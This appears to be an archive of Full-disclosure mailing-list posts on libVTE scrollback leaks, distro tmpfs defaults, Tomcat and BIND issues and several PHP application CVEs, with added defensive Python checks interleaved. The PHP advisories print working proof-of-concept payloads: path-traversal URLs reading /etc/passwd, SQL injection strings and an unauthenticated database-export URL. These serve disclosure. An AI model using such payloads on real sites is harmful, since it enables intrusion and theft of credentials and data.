 tmpfs                           /tmp   tmpfs  defaults  0 0
 
 Removed other options it should have, but defaults do not include
 nosuid,nodev,noexec.

 You obviously customized the install or changed it post installation as
this is not the default way it gets setup.  Below is the filesystem
setup when using all the default options (no customization):

# df -hP
FilesystemSize  Used Avail Use% Mounted on
rootfs5.5G  2.1G  3.4G  39% /
udev  495M 0  495M   0% /dev
tmpfs 502M  272K  501M   1% /dev/shm
tmpfs 502M  612K  501M   1% /run
/dev/mapper/vg_fedora15test-lv_root  5.5G  2.1G  3.4G  39% /
tmpfs 502M 0  502M   0% /sys/fs/cgroup
tmpfs 502M 0  502M   0% /media
/dev/sda1 485M   30M  430M   7% /boot
/dev/mapper/vg_fedora15test-lv_root  5.5G  2.1G  3.4G  39% /tmp
/dev/mapper/vg_fedora15test-lv_root  5.5G  2.1G  3.4G  39% /var/tmp
/dev/mapper/vg_fedora15test-lv_root  5.5G  2.1G  3.4G  39% /home

Despite what the above looks like, /tmp is actually part of the root
filesystem.

Yes, of course you can change your setup post install or if you're
daring enough during the install, but that wasn't the point of the
research.


-- 
Mark S. Krenz
IT Director
Suso Technology Services, Inc.
 
Sent from Mutt using Linux



[Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default

2012-04-12 Thread Mark Krenz

 Hello. After posting the flaw with libvte's handling of the scrollback
buffer (writing it to disk), there were several people who made the
erroneous claim that most distributions of Linux use tmpfs now and
encrypt swap and that this shouldn't be an issue.

 Because these claims attempted to diminish the importance of the flaw
for many, I installed most of the popular distributions of Linux as well
as some of the BSDs for comparison to see what their default setup was
after installation. I have found that of the 35+ distribution versions
that I tested, only the latest Arch Linux puts /tmp on tmpfs by default
and the only other distributions that show it as an option during
installation are Mageia or PC Linux OS.  So the libvte flaw indeed is a
widespread problem.

I've documented the results at:

 http://www.climagic.org/bugreports/libvte-flaw-distro-defaults-chart.html


You can view the libvte bug report here:

 http://climagic.org/bugreports/libvte-scrollback-written-to-disk.html


Extra Note: I'm not suggesting that everyone put their /tmp on tmpfs
and/or start using encrypted filesystem. There are other considerations
which I talk about in the document above.


-- 
Mark S. Krenz
IT Director
Suso Technology Services, Inc.
 
Sent from Mutt using Linux

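A check for the two defaults this thread compares (whether /tmp is its own tmpfs mount carrying nosuid,nodev,noexec, as raised in the Fedora fstab exchange above, and whether each swap area sits on a dm-crypt device), written as an added Python example rather than the author's test procedure or chart. The /proc/mounts and /proc/swaps samples are constructed, and the dm-crypt test assumes the CRYPT- prefix cryptsetup puts in a device-mapper UUID, read live from /sys/block/dm-N/dm/uuid.

```python
"""Check the two defaults this thread compares: /tmp on tmpfs and swap on dm-crypt.

Added example, not the author's test procedure.  The samples are constructed;
the dm-crypt test relies on the CRYPT- prefix cryptsetup puts in a
device-mapper UUID (readable live from /sys/block/dm-N/dm/uuid).
"""
import os
from collections import namedtuple

Mount = namedtuple("Mount", "device point fstype options")
HARDENING_OPTIONS = {"nodev", "nosuid", "noexec"}

def parse_mounts(text):
    """Parse /proc/mounts lines: device mountpoint fstype options dump pass."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4:
            device, point, fstype, opts = parts[:4]
            point = point.replace("\\040", " ")      # /proc/mounts escapes spaces
            mounts.append(Mount(device, point, fstype, frozenset(opts.split(","))))
    return mounts

def covering_mount(mounts, path):
    """The mount that provides `path`: longest matching mount point; for stacked
    mounts on the same point, the one listed last (the visible one)."""
    best = None
    for m in mounts:
        if path == m.point or path.startswith(m.point.rstrip("/") + "/"):
            if best is None or len(m.point) >= len(best.point):
                best = m
    return best

def tmp_status(mounts, path="/tmp"):
    """Is `path` its own tmpfs mount, and which hardening options does it lack?"""
    m = covering_mount(mounts, path)
    options = m.options if m else frozenset()
    return {
        "mount_point": m.point if m else None,
        "fstype": m.fstype if m else None,
        "on_tmpfs": m is not None and m.point == path and m.fstype == "tmpfs",
        "missing_hardening": sorted(HARDENING_OPTIONS - options),
    }

def parse_swaps(text):
    """Paths of the swap areas listed in /proc/swaps (first line is the header)."""
    return [line.split()[0] for line in text.splitlines()[1:] if line.strip()]

def dm_uuid_live(device):
    """Device-mapper UUID of `device`, or '' when it is not a dm device."""
    name = os.path.basename(os.path.realpath(device))   # /dev/mapper/x -> dm-N
    try:
        with open(f"/sys/block/{name}/dm/uuid") as f:
            return f.read().strip()
    except OSError:
        return ""

def swap_status(swap_paths, uuid_of=dm_uuid_live):
    """[(swap area, encrypted)]: encrypted when the area is a dm-crypt target."""
    return [(path, uuid_of(path).startswith("CRYPT-")) for path in swap_paths]

def host_status():
    """Live check of this host (Linux only)."""
    with open("/proc/mounts") as f:
        tmp = tmp_status(parse_mounts(f.read()))
    with open("/proc/swaps") as f:
        swaps = swap_status(parse_swaps(f.read()))
    return tmp, swaps

# Constructed samples, modelled on the layouts discussed in the thread.
SAMPLE_MOUNTS_PLAIN = """\
rootfs / rootfs rw 0 0
/dev/mapper/vg_test-lv_root / ext4 rw,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda1 /boot ext4 rw,relatime 0 0
"""
SAMPLE_MOUNTS_TMPFS = """\
/dev/sda2 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
"""
SAMPLE_SWAPS = """\
Filename                                Type            Size    Used    Priority
/dev/dm-1                               partition       2097148 0       -1
/dev/sda3                               partition       1048572 0       -2
"""
SAMPLE_DM_UUIDS = {"/dev/dm-1": "CRYPT-LUKS1-0123456789abcdef-cryptswap"}

def sample_uuid(path):
    return SAMPLE_DM_UUIDS.get(path, "")

if __name__ == "__main__":
    print(tmp_status(parse_mounts(SAMPLE_MOUNTS_PLAIN)))
    print(tmp_status(parse_mounts(SAMPLE_MOUNTS_TMPFS)))
    print(swap_status(parse_swaps(SAMPLE_SWAPS), sample_uuid))
```

Calling host_status() on a Linux box runs the same checks against the live /proc and /sys files.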


[Full-disclosure] 'phpPaleo' Local File Inclusion (CVE-2012-1671)

2012-04-04 Thread Mark Stanislav
'phpPaleo' Local File Inclusion (CVE-2012-1671)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in index.php for language handling that allows
for local file inclusion using a null-byte attack on the 'lang' GET
parameter.


II. TESTED VERSION
---
4.8b156


III. PoC EXPLOIT
---
http://localhost/phppaleo/index.php?lang=../../../../../../../etc/passwd%00


IV. NOTES
---
* magic_quotes_gpc must be disabled and PHP must be < 5.3.4 for
null-byte attacks to work


V. SOLUTION
---
Upgrade to 4.8b157 or above.


VI. REFERENCES
---
http://sourceforge.net/projects/phppaleo/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1671


VII. TIMELINE
---
03/01/2012 - Initial vendor disclosure
03/02/2012 - Vendor patched and released an updated version
04/04/2012 - Public disclosure



[Full-disclosure] 'e-ticketing' SQL Injection (CVE-2012-1673)

2012-04-04 Thread Mark Stanislav
'e-ticketing' SQL Injection (CVE-2012-1673)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in loginscript.php that allows for SQL
injection of the 'user_name' and 'password' POST parameters.


II. TESTED VERSION
---
Released on 2011-11-30 (no versioning used)


III. PoC EXPLOIT
---
POST a form to loginscript.php with the value of 'password' set to: '
UNION SELECT * from user where user_name = 'admin


IV. SOLUTION
---
Do not use this software, no patched version exists at this time.


V. REFERENCES
---
http://sourceforge.net/projects/e-ticketing/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1673


VI. TIMELINE
---
03/01/2012 - Initial vendor disclosure
03/03/2012 - Vendor response and commitment to fix
03/20/2012 - Follow-up e-mail to vendor as no patched version was published yet
04/04/2012 - Public disclosure



[Full-disclosure] 'Hotel Booking Portal' SQL Injection (CVE-2012-1672)

2012-04-04 Thread Mark Stanislav
'Hotel Booking Portal' SQL Injection (CVE-2012-1672)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in getcity.php that allows for SQL injection of
the 'country' POST parameter.


II. TESTED VERSION
---
0.1


III. PoC EXPLOIT
---
POST a form to getcity.php with the value of 'country' set to: ' union
select null,null,load_file(0x2f6574632f706173737764),null,null,null,null,null
from users where 'a'='a


IV. SOLUTION
---
Do not use this software, no patched version exists at this time.


V. REFERENCES
---
http://sourceforge.net/projects/hbportal/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1672


VI. TIMELINE
---
03/02/2012 - Initial vendor disclosure
03/20/2012 - Received no response and sent a second e-mail to the vendor
04/04/2012 - Public disclosure



[Full-disclosure] 'PHP Grade Book' Unauthenticated SQL Database Export (CVE-2012-1670)

2012-03-23 Thread Mark Stanislav
'PHP Grade Book' Unauthenticated SQL Database Export (CVE-2012-1670)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in admin/index.php that allows for an
unauthenticated user to export the entire application database by accessing
the 'Database Backup' method without restriction. Due to the way sessions
are handled, an attacker can then simply pass the username and
password-hash via cookies to assume the administrative role without ever
knowing the clear-text version of the password.


II. TESTED VERSION
---
1.9.4


III. PoC EXPLOIT
---
http://localhost/phpGradeBook/admin/index.php?action=SaveSQL


IV. SOLUTION
---
Upgrade to 1.9.5 or above.


V. REFERENCES
---
http://sourceforge.net/projects/php-gradebook/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1670


VI. TIMELINE
---
02/29/2012 - Initial vendor disclosure
02/29/2012 - Vendor response and commitment to fix
03/01/2012 - Vendor patched and released an updated version
03/22/2012 - Public disclosure

[Full-disclosure] 'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)

2012-03-23 Thread Mark Stanislav
'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in index.php for module handling that allows
for local file inclusion using a null-byte attack on the 'module' GET
parameter.


II. TESTED VERSION
---
1.0.2


III. PoC EXPLOIT
---
http://localhost/phpMoneyBooks102/index.php?module=../../../../../etc/passwd%00


IV. NOTES
---
* magic_quotes_gpc must be disabled and PHP must be < 5.3.4 for
null-byte attacks to work


V. SOLUTION
---
Upgrade to 1.0.3 or above.


VI. REFERENCES
---
http://phpmoneybooks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1669


VII. TIMELINE
---
02/29/2012 - Initial vendor disclosure
03/01/2012 - Vendor patched and released an updated version
03/22/2012 - Public disclosure



Re: [Full-disclosure] gnome-terminal, xfce4-terminal, terminator and others write scrollback buffer to disk

2012-03-07 Thread Mark Krenz
On Wed, Mar 07, 2012 at 01:12:04AM GMT, coderman [coder...@gmail.com] said the 
following:
 On Tue, Mar 6, 2012 at 1:46 PM, Mark Krenz m...@suso.com wrote:
  Title: Gnome terminal, xfce4-terminal, terminator and other libVTE based
        terminals write scrollback buffer data to /tmp filesystem
 
 temp data in /tmp ? i'm shocked, SHOCKED!
 
 *cough*

  I think you misread that as temp. It says term. Might want to get your
eyes checked. ;-)


-- 
Mark S. Krenz
IT Director
Suso Technology Services, Inc.
 
Sent from Mutt using Linux



[Full-disclosure] gnome-terminal, xfce4-terminal, terminator and others write scrollback buffer to disk

2012-03-06 Thread Mark Krenz

Title: Gnome terminal, xfce4-terminal, terminator and other libVTE based
   terminals write scrollback buffer data to /tmp filesystem

Report date: 2011-03-06

Reported by: Mark Krenz

Severity: High depending on use and expectations

Software: libVTE v0.21.6 and later (since September 17th, 2009)

Copy of report available at:
http://www.climagic.com/bugreports/libvte-scrollback-written-to-disk.html

Affected software:
---
  gnome-terminal
  terminator
  xfce4-terminal
  guake
  evilvte
  lilyterm
  sakura
  termit
  Anything else that uses libVTE for a terminal widget.


Summary:
---
  Due to the way the history buffer is saved in terminal emulators
  using libVTE after version 0.21.6, data from inside your terminal
  window can end up on your local filesystem. This is most likely
  unexpected behavior in a terminal emulator and represents a very
  significant security issue.


Worst case scenario:
---
  Classified, secret or medical information that was accessed through a
  terminal window was thought to be safe because it was on a remote server
  and only accessed via SSH, but now it's also on the hard drive that is
  for sale online or stolen without having been wiped because this
  issue was not accounted for.


References:
---
  http://ftp.gnome.org/pub/GNOME/sources/vte/0.21/vte-0.21.6.changes
  https://bugzilla.gnome.org/show_bug.cgi?id=664611
  https://bugzilla.gnome.org/show_bug.cgi?id=631685
  https://bugzilla.xfce.org/show_bug.cgi?id=8183
  https://plus.google.com/u/0/104947878052533251426/posts/Q9JmPiEckD9
  http://www.climagic.com/bugreports/libvte-scrollback-written-to-disk.html


Video demonstration:
---
  I felt that the problems caused by this flaw can't be stressed
  enough and made a video demonstrating this problem. It can be viewed
  at:

   http://www.youtube.com/watch?v=LgNLHskYvVE


Description:
---
  The libVTE library implements the virtual terminal widget that is used
  by many widely used terminal emulators. This library handles how text is
  displayed within the terminal and also handles how the scrollback buffer
  is saved. On September 17th, 2009 a change was committed to libVTE by
  Behdad Esfahbod that altered the way the scrollback buffer was
  implemented in libVTE. The new way creates a file in the /tmp filesystem
  and immediately unlinks it. This is not an uncommon way of handling tmp
  files, however there are probably many people who would not expect
  data from within the terminal window to be written to disk. There is
  a sense of trust that the data in the terminal is only stored in memory
  and is cleared when the computer is shut off. In a sense, this bug
  is allowing the data to break the fourth wall.
  
  I discovered this issue in November of 2011 while talking about uses for
  the lsof command on the @climagic Twitter account. I immediately found
  which software was the culprit and submitted a bug report to Gnome's
  Bugzilla. The response so far has been that the developer does not
  consider this a bug. I also wrote to Behdad Esfahbod about the issue
  but have not heard back from him. I was giving these people a bit of
  time to respond or resolve the issue, but apparently that isn't going to
  happen without making a bigger deal of it. Other knowledgeable security
  people have considered this a major security issue.
  
  Daniel Gillmor brought this security issue up with the libvte
  developer Behdad Esfahbod, in June of 2011 in bug #631685, but didn't
  seem to convince Behdad that the code needed to be changed. Behdad
  indicated at the time that he wasn't planning on working on libVTE in
  the future. There have been a few posts in recent months in this bug
  report about seeing if something can be done in the kernel, but the two
  developers discussing it seem to be convinced that it's OK to write this
  data to disk. 
   
  Some may not consider this a bug and make the excuse that your
  terminal's memory stack may end up in swap anyways, or that only root
  would have access to the data or that you should encrypt /tmp. However
  due to the wide variety of ways in which people implement security on
  their systems, knowledge of this issue is essential to everyone who uses
  one of these affected terminal emulators. With as much memory as we have
  on modern hardware, some people simply turn off swap, which avoids the
  stack in swap issue. But those people may not know about this scrollback
  buffer issue.
  

Testing and reproducing the issue:
---
  On Linux, if you

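Added example, not part of Mark Krenz's report: the lsof-style check the report alludes to, done by reading /proc directly. It lists every file descriptor of a process that points at an already-unlinked file under /tmp or /var/tmp, which is exactly the footprint described above (create in /tmp, unlink, keep using). It assumes Linux procfs; the terminal names matched are the ones in the affected-software list, and self_check() reproduces the footprint inside the current process so the scan can be exercised without a running terminal.

```python
"""Find open-but-unlinked temp files per process (added example, assumes Linux /proc)."""
import os
import tempfile

TMP_DIRS = ('/tmp/', '/var/tmp/')
# /proc/<pid>/comm names of the libVTE-based terminals the report lists
# (comm is truncated to 15 characters, hence the prefix match for gnome-terminal-server)
VTE_TERMINALS = {'gnome-terminal', 'terminator', 'xfce4-terminal', 'guake',
                 'evilvte', 'lilyterm', 'sakura', 'termit'}


def is_deleted_tmp(target):
    """True for a readlink() result such as '/tmp/vteXXXXXX (deleted)'."""
    return target.endswith(' (deleted)') and target.startswith(TMP_DIRS)


def deleted_tmp_fds(pid):
    """Return [(fd, target)] for every fd of pid that refers to an unlinked temp file."""
    hits = []
    fd_dir = f'/proc/{pid}/fd'
    try:
        names = os.listdir(fd_dir)
    except OSError:            # no such pid, or not ours to read
        return hits
    for name in names:
        try:
            target = os.readlink(os.path.join(fd_dir, name))
        except OSError:        # fd closed between listdir and readlink
            continue
        if is_deleted_tmp(target):
            hits.append((int(name), target))
    return hits


def comm(pid):
    try:
        with open(f'/proc/{pid}/comm') as fh:
            return fh.read().strip()
    except OSError:
        return ''


def scan_terminals():
    """Yield (pid, comm, fd, target) for every VTE terminal holding such a file."""
    for name in os.listdir('/proc'):
        if not name.isdigit():
            continue
        c = comm(name)
        if c in VTE_TERMINALS or c.startswith('gnome-terminal'):
            for fd, target in deleted_tmp_fds(name):
                yield int(name), c, fd, target


def self_check():
    """Reproduce the footprint in this process: create, unlink, keep open, then look.
    Returns True if the scan finds it, None when there is no procfs to read."""
    if not os.path.isdir('/proc/self/fd'):
        return None
    fd, path = tempfile.mkstemp(prefix='vtecheck', dir='/tmp')
    try:
        os.unlink(path)
        return any(h[0] == fd for h in deleted_tmp_fds(os.getpid()))
    finally:
        os.close(fd)


if __name__ == '__main__':
    for pid, c, fd, target in scan_terminals():
        print(f'{pid} {c} fd={fd} {target}')
```

The scan only sees processes whose /proc entries you may read, so run it as the user who owns the terminal (or as root to cover all users). A hit proves the scrollback has touched the filesystem; it says nothing about whether those blocks were ever overwritten, which is the point the report makes about disposed disks.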
[Full-disclosure] [SECURITY] CVE-2011-3375 Apache Tomcat Information disclosure

2012-01-17 Thread Mark Thomas
CVE-2011-3375 Apache Tomcat Information disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.21
- Tomcat 6.0.30 to 6.0.33
- Earlier versions are not affected

Description:
For performance reasons, information parsed from a request is often
cached in two places: the internal request object and the internal
processor object. These objects are not recycled at exactly the same time.
When certain errors occur that need to be added to the access log, the
access logging process triggers the re-population of the request object
after it has been recycled. However, the request object was not recycled
before being used for the next request. That led to information leakage
(e.g. remote IP address, HTTP headers) from the previous request to the
next request.
The issue was resolved by ensuring that the request and response objects
were recycled after being re-populated to generate the necessary access
log entries.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Tomcat 7.0.x users should upgrade to 7.0.22 or later
- Tomcat 6.0.x users should upgrade to 6.0.35 or later

Credit:
The issue was initially reported via Apache Tomcat's public issue
tracker with the potential security implications identified by the
Apache Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
https://issues.apache.org/bugzilla/show_bug.cgi?id=51872

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] CVE-2012-0022 Apache Tomcat Denial of Service

2012-01-17 Thread Mark Thomas
CVE-2012-0022 Apache Tomcat Denial of Service

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.22
- Tomcat 6.0.0 to 6.0.33
- Tomcat 5.5.0 to 5.5.34
- Earlier, unsupported versions may also be affected

Description:
Analysis of the recent hash collision vulnerability identified unrelated
inefficiencies with Apache Tomcat's handling of large numbers of
parameters and parameter values. These inefficiencies could allow an
attacker, via a specially crafted request, to cause large amounts of CPU
to be used which in turn could create a denial of service.
The issue was addressed by modifying the Tomcat parameter handling code
to efficiently process large numbers of parameters and parameter values.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Tomcat 7.0.x users should upgrade to 7.0.23 or later
- Tomcat 6.0.x users should upgrade to 6.0.35 or later
- Tomcat 5.5.x users should upgrade to 5.5.35 or later

Credit:
The inefficiencies in handling large numbers of parameters were
identified by the Apache Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] CVE-2011-3376 Apache Tomcat - Privilege Escalation via Manager app

2011-11-08 Thread Mark Thomas
CVE-2011-3376 Apache Tomcat - Privilege Escalation via Manager app

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.21

Description:
This issue only affects environments running web applications that are
not trusted (e.g. shared hosting environments). The Servlets that
implement the functionality of the Manager application that ships with
Apache Tomcat should only be available to Contexts (web applications)
that are marked as privileged. However, this check was not being made.
This allowed an untrusted web application to use the functionality of
the Manager application. This could be used to obtain information on
running web applications as well as deploying additional web applications.

Mitigation:
Users of Tomcat 7.0.x should upgrade to 7.0.22 or later

Credit:
This issue was identified by Ate Douma

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] bind-9.8.1 remote code exec exploit?

2011-10-31 Thread Mark Andrews

In message c2122821abc4d89254092500a8814215.squir...@gameframe.net, nix@myproxylists.com writes:
 Hello list.
 
 I've source compile of BIND 9.8.1 on the server.
 
 I've been investigating weird iptables messages as follows:
 
 Oct 29 14:53:13 NIX kernel: IN= OUT=eth0 SRC=MY_SERVER_IP DST=62.80.128.29
 LEN=114 TOS=0x00 PREC=0x00 TTL=64 ID=31795 PROTO=UDP SPT=53 DPT=5060
 LEN=94
 
 I received a message from my ISP abuse that my server is scanning SIP port
 5060 and I set the firewall rule to deny/log all UDP connections out of
 the box to port 5060 to get timestamps for further investigation. This
 happened before I set the firewall rule.

You are just blocking legitimate reply traffic.  Your ISP is probably
misclassifying traffic it sees destined to port 5060.  Nameservers
randomly pick source ports to make it harder for off path attackers
to spoof reply packets and, unless something is already using port
5060, port 5060 is fair game.

You can stop your own nameservers using 5060 as a query source port
with avoid-v4-udp-ports but it doesn't do much to help with queries
to you.

avoid-v4-udp-ports { 5060; };
avoid-v6-udp-ports { 5060; };

You should also adjust your firewall to let packets sourced from
port 53 on your nameservers to any port go through.  That way you
won't get false positives.

Mark

 /var/log/named.log
 
 05-Oct-2011 06:05:58.093 client: warning: client 81.25.53.2#5060: error
 sending response: host unreachable
 07-Oct-2011 13:14:38.739 client: warning: client 221.210.153.6#5060: error
 sending response: host unreachable
 08-Oct-2011 00:43:22.881 client: warning: client 212.59.18.8#5060: error
 sending response: host unreachable
 08-Oct-2011 13:42:58.943 client: warning: client 202.43.160.50#5060: error
 sending response: host unreachable
 12-Oct-2011 10:26:20.586 client: warning: client 213.77.43.115#5060: error
 sending response: host unreachable
 14-Oct-2011 15:42:12.676 client: warning: client 193.210.19.19#5060: error
 sending response: host unreachable
 15-Oct-2011 16:26:16.573 client: warning: client 202.44.204.36#5060: error
 sending response: host unreachable
 16-Oct-2011 20:52:44.570 client: warning: client 200.63.56.5#5060: error
 sending response: host unreachable
 17-Oct-2011 01:48:49.617 client: warning: client 84.22.23.4#5060: error
 sending response: host unreachable
 23-Oct-2011 12:34:26.255 client: warning: client 208.69.35.15#5060: error
 sending response: host unreachable
 25-Oct-2011 01:50:17.382 client: warning: client 84.88.226.10#5060: error
 sending response: host unreachable
 25-Oct-2011 15:23:51.384 client: warning: client 195.222.32.20#5060: error
 sending response: host unreachable
 29-Oct-2011 14:53:13.208 client: warning: client 62.80.128.29#5060: error
 sending response: host unreachable
 
 Timestamps matches exactly to kernel's firewall log. Every time BIND error
 log has the above entry, the box tries to scan for SIP port 5060.
 
 Is it possible to scan ports through BIND or exec code by sending a
 specially crafted request?
 
 PS. I have been tracking this issue for a week and no other timestamps
 matches exactly to this isssue. I have currently grsec' exec logging on
 and hoping this issue occurs soon so I can see will it execute extra code
 under the user 'bind'.
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
-- 
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: ma...@isc.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
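Added example, not from the thread: the triage Mark Andrews describes, as code that can be run over the two logs. A UDP packet leaving the nameserver with source port 53 is a reply to whoever queried from DST:DPT, so it is classified as a DNS reply rather than a SIP probe, and each such line is then paired with BIND's own "error sending response" entry for the same client ip#port. The kernel line is the one quoted in the post (netfilter LOG omits the year, assumed to be 2011 here); the second kernel line, showing what a real outbound probe to 5060 would look like, is constructed.

```python
"""Correlate netfilter LOG lines with BIND 'error sending response' lines (added example)."""
import re
from datetime import datetime

IPT_RE = re.compile(
    r'^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: .*?'
    r'SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\w+) SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)')
BIND_RE = re.compile(
    r'^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2})\.\d+ client: warning: '
    r'client (?P<ip>[\d.]+)#(?P<port>\d+): error sending response')


def classify(line):
    """Label one LOG line. Source port 53 means an answer to a query that arrived
    from DST:DPT; only some other source port aimed at 5060 looks like a SIP probe."""
    m = IPT_RE.match(line)
    if not m:
        return None
    spt, dpt = int(m['spt']), int(m['dpt'])
    if m['proto'] == 'UDP' and spt == 53:
        verdict = 'dns-reply'
    elif m['proto'] == 'UDP' and dpt == 5060:
        verdict = 'sip-probe?'
    else:
        verdict = 'other'
    return {'ts': m['ts'], 'dst': m['dst'], 'dpt': dpt, 'spt': spt, 'verdict': verdict}


def parse_bind(line):
    m = BIND_RE.match(line)
    if not m:
        return None
    return {'ts': datetime.strptime(m['ts'], '%d-%b-%Y %H:%M:%S'),
            'ip': m['ip'], 'port': int(m['port'])}


def correlate(ipt_lines, bind_lines, year=2011, window=2):
    """[(client ip, client port, time)] for every dns-reply LOG line that BIND also
    logged as a failed response to the same ip#port within `window` seconds."""
    bind = [b for b in map(parse_bind, bind_lines) if b]
    pairs = []
    for line in ipt_lines:
        ev = classify(line)
        if not ev or ev['verdict'] != 'dns-reply':
            continue
        ts = datetime.strptime(f"{ev['ts']} {year}", '%b %d %H:%M:%S %Y')
        if any(b['ip'] == ev['dst'] and b['port'] == ev['dpt']
               and abs((b['ts'] - ts).total_seconds()) <= window for b in bind):
            pairs.append((ev['dst'], ev['dpt'], ts.isoformat()))
    return pairs


# First line quoted from the post; second line constructed to show a real probe.
KERNEL_LOG = [
    "Oct 29 14:53:13 NIX kernel: IN= OUT=eth0 SRC=MY_SERVER_IP DST=62.80.128.29 LEN=114 "
    "TOS=0x00 PREC=0x00 TTL=64 ID=31795 PROTO=UDP SPT=53 DPT=5060 LEN=94",
    "Oct 29 14:55:01 NIX kernel: IN= OUT=eth0 SRC=MY_SERVER_IP DST=198.51.100.9 LEN=60 "
    "TOS=0x00 PREC=0x00 TTL=64 ID=1 PROTO=UDP SPT=41234 DPT=5060 LEN=40",
]
# Two of the named.log lines quoted in the post.
NAMED_LOG = [
    "29-Oct-2011 14:53:13.208 client: warning: client 62.80.128.29#5060: error "
    "sending response: host unreachable",
    "25-Oct-2011 15:23:51.384 client: warning: client 195.222.32.20#5060: error "
    "sending response: host unreachable",
]

if __name__ == '__main__':
    for line in KERNEL_LOG:
        print(classify(line)['verdict'], line[:60])
    print(correlate(KERNEL_LOG, NAMED_LOG))
```

The firewall change in the reply follows from the same rule: allow UDP with source port 53 from the nameserver to any destination port before the rule that logs or drops traffic to 5060, and the false positives disappear while real outbound probes (source port not 53) are still caught.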


[Full-disclosure] [SECURITY] CVE-2011-1184 Apache Tomcat - Multiple weaknesses in HTTP DIGEST authentication

2011-09-26 Thread Mark Thomas
CVE-2011-1184 Apache Tomcat - Multiple weaknesses in HTTP DIGEST
authentication

Severity: Moderate

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.11
- Tomcat 6.0.0 to 6.0.32
- Tomcat 5.5.0 to 5.5.33
- Earlier, unsupported versions may also be affected

Description:
The implementation of HTTP DIGEST authentication was discovered to
have several weaknesses:
- replay attacks were permitted
- server nonces were not checked
- client nonce counts were not checked
- qop values were not checked
- realm values were not checked
- the server secret was hard-coded to a known string
The result of these weaknesses is that DIGEST authentication was only
as secure as BASIC authentication.

Mitigation:
Users of Tomcat 7.0.x should upgrade to 7.0.12 or later
Users of Tomcat 6.0.x should upgrade to 6.0.33 or later
Users of Tomcat 5.5.x should upgrade to 5.5.34 or later

Credit:
This issue was identified by the Apache Tomcat security team

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
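Added example, not Tomcat's code: a server-side HTTP Digest check (RFC 2617, qop=auth) that performs every validation the advisory lists as missing. The nonce is issue-time plus an HMAC under a per-process random secret, so it can be verified without storing it and expires; the nonce count must increase, which is what stops a captured Authorization header from being replayed; realm and qop are compared against what the server offered. Realm, user table, secret and lifetime are assumed values for the demonstration, and the password table is cleartext only to keep the example short.

```python
"""HTTP Digest verification with nonce, nc, qop and realm checks (added example)."""
import hashlib
import hmac
import os
import time


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def client_response(username, password, realm, method, uri, nonce, nc, cnonce, qop='auth'):
    """RFC 2617 response for qop=auth, i.e. what the browser computes."""
    ha1 = md5hex(f'{username}:{realm}:{password}')
    ha2 = md5hex(f'{method}:{uri}')
    return md5hex(f'{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}')


def build_auth(username, password, realm, method, uri, nonce, nc, cnonce):
    """Parameters of an Authorization: Digest header a client would send."""
    return {'username': username, 'realm': realm, 'nonce': nonce, 'uri': uri,
            'qop': 'auth', 'nc': nc, 'cnonce': cnonce,
            'response': client_response(username, password, realm, method, uri, nonce, nc, cnonce)}


class DigestVerifier:
    def __init__(self, realm, users, secret=None, nonce_ttl=300):
        self.realm = realm
        self.users = users                      # username -> password (demo only)
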